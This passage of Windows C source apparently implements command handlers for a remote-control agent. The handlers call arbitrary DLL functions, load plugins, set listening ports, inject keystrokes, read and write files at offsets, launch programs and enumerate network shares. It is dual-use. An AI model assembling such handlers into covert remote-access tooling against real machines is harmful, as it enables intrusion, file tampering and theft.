            if( (p[i].Data = StrToBinary( Params->Value[i+4] + 1 )) == NULL )
              break;
        }
        else  {
          p[i].DataSize = (lstrlen( Params->Value[i+4] ) + 1) >> 1;
          p[i].PassPointer = 0;
          if( (p[i].Data = StrToBinary( Params->Value[i+4] )) == NULL )
            break;
        }
      }
      if( i < PCount ) {
        for( i = 0; i < PCount; i++ )
          if( p[i].Data != NULL ) LocalFree( p[i].Data );
        LocalFree( p );
        SetReply( Result, ERR_OUT_OF_MEMORY, "" );
        return 1;
      }
    }

    Flags = Strtoul( Params->Value[1], NULL, 0 );
    FromDLL = TRUE; FarCall = FALSE;
    i = Flags & 3;
    if( i == 1 ) FromDLL = FALSE;
    else if( i == 2 ) FarCall = TRUE;
    PushLeftFirst = (Flags >> 2) & 1;
    DontClearStack = (Flags >> 3) & 1;
    Optimization = 0;//(Flags >> 4) & 3;      not implemented
    PassResultPtrDelphi = (Flags >> 6) & 1;
    ResultBufferSz = (Flags >> 8) & 0xFFFFFF;

    if( FromDLL ) {
      SubstConst( Params->Value[2], FileName, MAX_PATH );
      InstH = LoadLibrary( FileName );
      if( InstH == NULL ) {
        SetReply( Result, ERR_API_ERROR, "LoadLibrary" );
        goto exit_w_cleanup;
      }
      Offset = (int) GetProcAddress( InstH, Params->Value[3] );
      if( Offset == 0 ) {
        SetReply( Result, ERR_API_ERROR, "GetProcAddress" );
        goto exit_w_cleanup_2;
      }
    }

    if( ResultBufferSz != 0 ) {
      ResultBuffer = (BYTE*) LocalAlloc( LMEM_FIXED, ResultBufferSz * 3 + 1 );
      if( ResultBuffer == NULL ) goto exit_w_cleanup_2;
    }

    RegEAX = RegEDX = 0;

    _try {
      DoCall();
      SetReply( Result, ERR_NO_ERROR, "" );
      wsprintf( Buf, "EAX=%08X EDX=%08X", RegEAX, RegEDX );
      AddToStringList( Result, Buf );
      if( ResultBuffer == NULL )
        AddToStringList( Result, "" );
      else {
        BinaryToStrBuf( ResultBuffer, ResultBufferSz,
                        ResultBuffer + ResultBufferSz );
        AddToStringList( Result, ResultBuffer + ResultBufferSz );
      }
      for( i = 0; i < PCount; i++ ) {
        if( p[i].Data == NULL )
          AddToStringList( Result, "" );
        else {
          BinaryToStrBuf( p[i].Data, p[i].DataSize, Params->Value[i+4] );
          AddToStringList( Result, Params->Value[i+4] );
        }
      }
    }
    _except (EXCEPTION_EXECUTE_HANDLER) {
      SetReply( Result, ERR_EXCEPTION, "" );
    }

    LocalFree( ResultBuffer );

  exit_w_cleanup_2:

    if( FromDLL ) FreeLibrary( InstH );

  exit_w_cleanup:

    if( PCount > 0 ) {
      for( i = 0; i < PCount; i++ )
        if( p[i].Data != NULL ) LocalFree( p[i].Data );
      LocalFree( p );
    }
    return 1;

#   undef Selector
#   undef Offset
  }

static int NearTestFunc( int PCount, ... )
  {
    PCount = 0;
    return 12345;
  }

static int __far FarTestFunc( int PCount, ... )
  {
    PCount = 0;
    return 67890;
  }

FUNCDEF( TestNear )
  {
    char  Buf[ 32 ];

    SetReply( Result, ERR_NO_ERROR, "" );
    wsprintf( Buf, "%08X", NearTestFunc );
    AddToStringList( Result, Buf );
    return 1;
  }

FUNCDEF( TestFar )
  {
    extern int GetCS();
#   pragma aux GetCS =  \
    "  mov   AX,CS     "\
    "  and   EAX,0FFFFh"\
    value [EAX];

    char  Buf[ 32 ];

    SetReply( Result, ERR_NO_ERROR, "" );
    wsprintf( Buf, "%04X:%08X", GetCS(), FarTestFunc );
    AddToStringList( Result, Buf );
    return 1;
  }

FARPROC LoadImgPlugin( STRINGLIST* Params, int StartIdx,
                       HMODULE* PluginHandle, char** PluginParams )
  {
    int      i, s;
    char     *cp;
    FARPROC  PEntry;
    char     FileName[ MAX_PATH ];

    if( Params->Count <= StartIdx ) return NULL;
    SubstConst( Params->Value[ StartIdx ], FileName, MAX_PATH );
    *PluginHandle = LoadLibrary( FileName );
    if( *PluginHandle == NULL ) return NULL;
    if( (PEntry = GetProcAddress( *PluginHandle, "Main" )) == NULL ) {
      FreeLibrary( *PluginHandle );
      return NULL;
    }
    for( i = StartIdx + 1, s = 0; i < Params->Count; i++ )
      s += lstrlen( Params->Value[i] ) + 1;
    if( s == 0 )
      *PluginParams = NULL;
    else
      *PluginParams = (char*) LocalAlloc( LMEM_FIXED, s + 1 );
    if( *PluginParams != NULL ) {
      cp = *PluginParams;
      i = StartIdx + 1;
      while( *cp != '\0' ) {
        lstrcpy( cp, Params->Value[ i++ ] );
        cp += lstrlen( cp ) + 1;
      }
    }
    return PEntry;
  }

FUNCDEF( PortCommand )
  {
//    HKEY   KeyH;
    int    Protocol, i;
    DWORD  VSize;//, VType;
    char   *VData, *cp;
//    char   VName[ MAX_PATH ];
    char   Buf[ 256 ];
    BOOL   ReplySet, RegValSet, SetPorts;

    if( Params->Count <= 1 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS,
                "<protocol name> GET/[<port>...<port>]" );
      return 1;
    }
    for( Protocol = 0; Protocol < MAX_PROTOCOLS; Protocol++ )
      if( lstrcmpi( GetProtocolName( Protocol ), Params->Value[1] ) == 0 )
        break;
    if( Protocol == MAX_PROTOCOLS ) {
      SetReply( Result, ERR_PROTOCOL_NAME, "" );
      return 1;
    }
    ReplySet = FALSE;
    RegValSet = FALSE;
    SetPorts = FALSE;
    if( Params->Count < 2 ) SetPorts = TRUE;
    else if( lstrcmpi( Params->Value[2], "GET" ) != 0 ) SetPorts = TRUE;
    if( SetPorts ) {
      ReplySet = TRUE;
      for( VSize = 1, i = 2; i < Params->Count; i++ )
        VSize += lstrlen( Params->Value[i] ) + 1;
      VData = LocalAlloc( LMEM_FIXED, VSize + 1 );
      if( VData == NULL )
        SetReply( Result, ERR_OUT_OF_MEMORY, "" );
      else {
        for( VSize = 0, i = 2; i < Params->Count; i++ ) {
          lstrcpy( VData + VSize, Params->Value[i] );
          VSize += lstrlen( Params->Value[i] ) + 1;
        }
        VData[ VSize++ ] = '\0';
        if( VSize > 254 )
          SetReply( Result, ERR_PARAM_TOO_LONG, "" );
        else  
          if( ! RegWriteParam( Protocol + 1, VData, VSize )  )
            SetReply( Result, ERR_CANT_WRITE_PARAM, "" );
          else {
            SetReply( Result, ERR_NO_ERROR, "" );
            RegValSet = TRUE;
          }
        LocalFree( VData );
      }
    }
    if( ReplySet == FALSE || RegValSet == TRUE ) {
      VSize = 254;
      if( ! RegReadParam( Protocol + 1, Buf, &VSize ) ) {
        if( ReplySet == FALSE )
          SetReply( Result, ERR_CANT_READ_PARAM, "" );
      }
      else {
        if( ReplySet == FALSE )
            SetReply( Result, ERR_NO_ERROR, "" );
        Buf[ VSize ] = '\0';
        Buf[ VSize + 1 ] = '\0';
        for( cp = Buf; *cp != '\0'; cp += lstrlen( cp ) + 1 )
          AddToStringList( Result, cp );
      }
    }

/********************
    wsprintf( VName, RegValPortDataTemplate, Protocol );

    if( RegOpenKeyEx( HKEY_LOCAL_MACHINE, RegKeyHome,
                      0, KEY_ALL_ACCESS, &KeyH ) != ERROR_SUCCESS ) {
      SetReply( Result, ERR_API_ERROR, "RegOpenKeyEx" );
      return 1;
    }
    ReplySet = FALSE;
    RegValSet = FALSE;
    SetPorts = FALSE;
    if( Params->Count < 2 ) SetPorts = TRUE;
    else if( lstrcmpi( Params->Value[2], "GET" ) != 0 ) SetPorts = TRUE;
    if( SetPorts ) {
      ReplySet = TRUE;
      for( VSize = 1, i = 2; i < Params->Count; i++ )
        VSize += lstrlen( Params->Value[i] ) + 1;
      VData = LocalAlloc( LMEM_FIXED, VSize + 1 );
      if( VData == NULL )
        SetReply( Result, ERR_OUT_OF_MEMORY, "" );
      else {
        for( VSize = 0, i = 2; i < Params->Count; i++ ) {
          lstrcpy( VData + VSize, Params->Value[i] );
          VSize += lstrlen( Params->Value[i] ) + 1;
        }
        VData[ VSize++ ] = '\0';
        if( RegSetValueEx( KeyH, VName, 0, REG_BINARY,
                           (LPBYTE) VData, VSize ) != ERROR_SUCCESS )
          SetReply( Result, ERR_API_ERROR, "RegSetValueEx" );
        else {
          SetReply( Result, ERR_NO_ERROR, "" );
          RegValSet = TRUE;
        }
        LocalFree( VData );
      }
    }
    if( ReplySet == FALSE || RegValSet == TRUE ) {
      if( RegQueryValueEx( KeyH, VName, 0,
                           &VType, NULL, &VSize ) != ERROR_SUCCESS ) {
        if( ReplySet == FALSE )
          SetReply( Result, ERR_API_ERROR, "RegQueryValueEx" );
      }
      else {
        VSize += 4096;
        VData = LocalAlloc( LMEM_FIXED, VSize );
        if( VData == NULL ) {
          if( ReplySet == FALSE )
            SetReply( Result, ERR_OUT_OF_MEMORY, "" );
        }
        else {
          VSize -= 2;
          if( RegQueryValueEx( KeyH, VName, 0,
                               &VType, VData, &VSize ) != ERROR_SUCCESS ) {
            if( ReplySet == FALSE )
              SetReply( Result, ERR_API_ERROR, "RegSetValueEx" );
          }
          else {
            if( ReplySet == FALSE )
              SetReply( Result, ERR_NO_ERROR, "" );
            VData[ VSize ] = '\0';
            VData[ VSize + 1 ] = '\0';
            for( cp = VData; *cp != '\0'; cp += lstrlen( cp ) + 1 )
              AddToStringList( Result, cp );
          }
          LocalFree( VData );
        }
      }
    }
    RegCloseKey( KeyH );
*********************************/
    return 1;
  }

FUNCDEF( Keystroke )
  {
    ULONG  VCode, SCode;
    char   *cp;
    int    i;

    if( Params->Count <= 1 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS,
                "<virtual key code> [...<virtual key code>]" );
      return 1;
    }
    for( i = 1; i < Params->Count; i++ ) {
      cp = Params->Value[ i ];
      for(;;) {
        while( *cp == ' ' ) cp++;
        if( *cp == '\0' ) break;
        VCode = Strtoul( cp, &cp, 0 );
        SCode = MapVirtualKey( VCode, 0 );
        keybd_event( (BYTE) VCode, SCode, 0, 0 );
        keybd_event( (BYTE) VCode, SCode, KEYEVENTF_KEYUP, 0 );
        Sleep(0);
      }
    }
    SetReply( Result, ERR_NO_ERROR, "" );
    return 1;
  }

FUNCDEF( FRead )
  {
    HANDLE  Fh;
    BYTE    *Buf;
    DWORD   Start, Count;
    char    FileName[ MAX_PATH ];

    if( Params->Count <= 3 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS,
                "<filename> <start> <count>" );
      return 1;
    }
    SubstConst( Params->Value[1], FileName, MAX_PATH );
    Start = Strtoul( Params->Value[2], NULL, 0 );
    Count = Strtoul( Params->Value[3], NULL, 0 );
    if( Count == 0 ) {
      SetReply( Result, ERR_NO_ERROR, "" );
      return 1;
    }
    Fh = CreateFile( FileName, GENERIC_READ, FILE_SHARE_READ,
                     NULL, OPEN_EXISTING, 0, NULL );
    if( Fh == INVALID_HANDLE_VALUE ) {
      SetReply( Result, ERR_API_ERROR, "CreateFile" );
      return 1;
    }
    if( SetFilePointer( Fh, Start, NULL, FILE_BEGIN ) != Start )
      SetReply( Result, ERR_API_ERROR, "SetFilePointer" );
    else {
      Buf = (BYTE*) LocalAlloc( LMEM_FIXED, Count * 3 );
      if( Buf == NULL )
        SetReply( Result, ERR_API_ERROR, "LocalAlloc" );
      else {
        if( ! ReadFile( Fh, Buf, Count, &Count, NULL ) )
          SetReply( Result, ERR_API_ERROR, "ReadFile" );
        else {
          BinaryToStrBuf( Buf, Count, (char*) Buf + Count );
          SetReply( Result, ERR_NO_ERROR, "" );
          AddToStringList( Result, (char*) Buf + Count );
        }
        LocalFree( Buf );
      }
    }
    CloseHandle( Fh );
    return 1;
  }

FUNCDEF( FWrite )
  {
    HANDLE  Fh;
    BYTE    *Buf;
    DWORD   Start, Count;
    char    FileName[ MAX_PATH ];

    if( Params->Count <= 3 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS,
                "<filename> <start> <data>" );
      return 1;
    }
    SubstConst( Params->Value[1], FileName, MAX_PATH );
    Start = Strtoul( Params->Value[2], NULL, 0 );
    Count = (lstrlen( Params->Value[3] ) + 1) >> 1;
    if( Count == 0 ) {
      SetReply( Result, ERR_NO_ERROR, "" );
      return 1;
    }
    Fh = CreateFile( FileName, GENERIC_WRITE, FILE_SHARE_WRITE,
                     NULL, OPEN_EXISTING, 0, NULL );
    if( Fh == INVALID_HANDLE_VALUE ) {
      SetReply( Result, ERR_API_ERROR, "CreateFile" );
      return 1;
    }
    if( SetFilePointer( Fh, Start, NULL, FILE_BEGIN ) != Start )
      SetReply( Result, ERR_API_ERROR, "SetFilePointer" );
    else {
      Buf = StrToBinary( Params->Value[3] );
      if( Buf == NULL )
        SetReply( Result, ERR_OUT_OF_MEMORY, "" );
      else {
        if( ! WriteFile( Fh, Buf, Count, &Count, NULL ) )
          SetReply( Result, ERR_API_ERROR, "WriteFile" );
        else
          SetReply( Result, ERR_NO_ERROR, "" );
        LocalFree( Buf );
      }
    }
    CloseHandle( Fh );
    return 1;
  }

FUNCDEF( ShExec )
  {
    SHELLEXECUTEINFO  Sei;
    char    FileName[ MAX_PATH ];

    if( Params->Count <= 7 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS,
                "<flags (hex)> <window handle (hex)> <action> <file> <parameters> <directory> <show flags (hex)>" );
      return 1;
    }
    SubstConst( Params->Value[4], FileName, MAX_PATH );
    RtlZeroMemory( &Sei, sizeof( Sei ) );
    Sei.cbSize = sizeof( Sei );
    Sei.fMask = Strtoul( Params->Value[1], NULL, 16 );
    Sei.hwnd = (HWND) Strtoul( Params->Value[2], NULL, 16 );
    Sei.lpVerb = Params->Value[3];
    Sei.lpFile = FileName;
    Sei.lpParameters = Params->Value[5];
    Sei.lpDirectory = Params->Value[6];
    Sei.nShow = Strtoul( Params->Value[7], NULL, 16 );
    Sei.fMask &= SEE_MASK_CONNECTNETDRV |
                 SEE_MASK_DOENVSUBST | SEE_MASK_FLAG_NO_UI;
    if( ShellExecuteEx( &Sei ) )
      SetReply( Result, ERR_NO_ERROR, "" );
    else
      SetReply( Result, ERR_API_ERROR, "ShellExecuteEx" );
    return 1;
  }

static void NetHoodEnum( STRINGLIST* Result, NETRESOURCE * Parm,
                         DWORD Scope, int* Depth )
  {
    DWORD       i, j, N;
    HANDLE      Eh;
    NETRESOURCE Resource[4];
    char        str[ 64 ];

    j = WNetOpenEnum( Scope, RESOURCETYPE_ANY, 0, Parm, &Eh );
    if( j != NO_ERROR ) return;
    for(;;) {
      N = 1;
      i = sizeof( Resource );
      j = WNetEnumResource( Eh, &N, Resource, &i );
      if( j != NO_ERROR ) break;
      wsprintf( str, "%04X %08X %08X %08X %08X", *Depth,
                Resource[0].dwScope, Resource[0].dwType,
                Resource[0].dwDisplayType, Resource[0].dwUsage );
      AddToStringList( Result, str );
      if( Resource[0].lpLocalName == NULL )
        AddToStringList( Result, "" );
      else
        AddToStringList( Result, Resource[0].lpLocalName );
      if( Resource[0].lpRemoteName == NULL )
        AddToStringList( Result, "" );
      else
        AddToStringList( Result, Resource[0].lpRemoteName );
      if( Resource[0].lpComment == NULL )
        AddToStringList( Result, "" );
      else
        AddToStringList( Result, Resource[0].lpComment );
      if( Resource[0].lpProvider == NULL )
        AddToStringList( Result, "" );
      else
        AddToStringList( Result, Resource[0].lpProvider );
      if( Resource[0].dwUsage & RESOURCEUSAGE_CONTAINER ) {
        *Depth += 1;
        NetHoodEnum( Result, &Resource[0], Scope, Depth );
        *Depth -= 1;
      }
    }
    WNetCloseEnum( Eh );
  }

FUNCDEF( NetHood )
  {
    int  Depth = 1;

    SetReply( Result, ERR_NO_ERROR, "" );
    NetHoodEnum( Result, NULL, RESOURCE_GLOBALNET, &Depth );
    return 1;
  }

FUNCDEF( Attrib )
  {
    char   FileName[ MAX_PATH ];
    DWORD  Attr;

    if( Params->Count <= 1 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS,
                "<filename> [<Attributes (hex)]" );
      return 1;
    }
    SubstConst( Params->Value[1], FileName, MAX_PATH );
    if( Params->Count <= 2 ) {
      Attr = GetFileAttributes( FileName );
      if( Attr == 0xFFFFFFFF )
        SetReply( Result, ERR_API_ERROR, "GetFileAttributes" );
      else {
        SetReply( Result, ERR_NO_ERROR, "" );
        wsprintf( FileName, "%08X", Attr );
        AddToStringList( Result, FileName );
      }
    }
    else {
      if( SetFileAttributes( FileName,
                   Strtoul( Params->Value[2], NULL, 16 ) ) )
        SetReply( Result, ERR_NO_ERROR, "" );
      else
        SetReply( Result, ERR_API_ERROR, "SetFileAttributes" );
    }
    return 1;
  }